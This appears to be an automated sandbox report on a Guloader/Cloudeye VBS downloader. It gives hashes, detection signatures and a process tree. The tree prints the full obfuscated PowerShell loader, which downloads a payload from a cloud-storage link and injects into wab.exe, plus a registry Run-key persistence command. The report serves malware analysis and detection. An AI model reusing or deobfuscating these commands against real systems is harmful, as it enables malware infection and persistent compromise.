Analysis
-
max time kernel
13s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
23/04/2024, 02:08
General
-
Target
copy_76499Kxls.vbs
-
Size
279KB
-
MD5
d51dd423c5f2103977df604208989252
-
SHA1
4944a47a3a05658a7fec601bf526c7913832c587
-
SHA256
e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002
-
SHA512
e91bc05bd874233aa264b244ae0ff0faa0fed6ca4161d2af89f8da4099b79c55b6837cf14416a5e1031faf80cf46b3a821803c432a5d7cc99798367509647709
-
SSDEEP
6144:L6dAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOb987HIJFJW:WnS2ImtCo5inX
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\copy_76499Kxls.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"6⤵
- Modifies registry key
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5f9f70c9deec5ec271140632d3eee87b0
SHA185c5ea4286e5206fcfb6068987b0ca0a86c0c623
SHA2564ec64ae5fb2fe72a63cbf0a96a0abe44575dfb39ee3932876295995b110e58d7
SHA5125283cf189540822397a7393d1a4ad7e52fd6aa7dc6ef967181ae3394b3fafda0d18cb37d123cc721bafb9799ec3da371a285ff1e6c62d542f9b633acfe7a19e0
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
7KB
MD5c98f98014ec7393569b1ccb9cb7ec7bd
SHA11d7d50f94549536e26ceaf33b718fbbace799796
SHA256f1833f30b0dcf756052c18f76236e88dfb395817ab5e2e48f83cab29ab5093ee
SHA51238b89e437a2830af89c7320cd6ab57b34352f2d5286f818c9d3f48550c37f15d33b193db027dee38a002942c4f9a06f2684f47561510eddbbff47e26220445f9
-
Filesize
441KB
MD584ca909be927e397aa5132074da15c07
SHA175a67d4ab19e9a1ed49e64feab9eed09ed33e181
SHA256761e72ae7fcd658fde092259e0981f1955214ea1bd01742ce69a6e322f7e1119
SHA512f3e964fd675e463917af94028b63ff672217ff1f7dbebf162d497299b9acbb5f6c5f48044772e6d0fee2e106788126838cd6736ec39bfeab5bb39426d5393b0f
-
Filesize
256KB
-
Filesize
1024KB
-
Filesize
5.7MB
-
Filesize
856KB
-
Filesize
1024KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
1.7MB
-
Filesize
256KB
-
Filesize
81.3MB
-
Filesize
4KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
81.3MB
-
Filesize
856KB
-
Filesize
1.7MB